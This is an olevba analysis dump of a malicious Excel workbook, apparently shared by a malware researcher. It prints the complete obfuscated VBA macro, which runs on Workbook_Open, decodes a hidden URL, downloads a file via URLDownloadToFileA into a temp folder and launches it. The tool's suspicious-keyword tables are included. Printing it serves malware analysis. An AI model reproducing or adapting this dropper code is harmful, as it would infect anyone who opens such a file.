dynamoo

Malicious Excel macro

Mar 11th, 2015
olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename
----------- -----------------------------------------------------------------
OLE:MAS---- inv86-~1.xls

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: inv86-~1.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub Workbook_Open()
atqk_x482mp6v
End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+----------+---------------+----------------------------------------+
| Type     | Keyword       | Description                            |
+----------+---------------+----------------------------------------+
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
+----------+---------------+----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Лист1.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист2.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Лист3.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class1.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class2.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO АавпавпАА.bas
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
No suspicious keyword or IOC found.
-------------------------------------------------------------------------------
VBA MACRO Class3.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class4.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Class5.cls
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO ываываААва.bas
in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#If VBA7 Then
    Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
    Private Declare Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub atqk_x482mp6v()
рпорпАавпавп tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
& Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))


End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))

ываААвыаыва.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function





- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------------+-----------------------------------------+
| Type       | Keyword            | Description                             |
+------------+--------------------+-----------------------------------------+
| Suspicious | CreateObject       | May create an OLE object                |
| Suspicious | Lib                | May run code from a DLL                 |
| Suspicious | Open               | May open a file                         |
| Suspicious | Environ            | May read system environment variables   |
| Suspicious | Chr                | May attempt to obfuscate specific       |
|            |                    | strings                                 |
| Suspicious | URLDownloadToFileA | May download files from the Internet    |
+------------+--------------------+-----------------------------------------+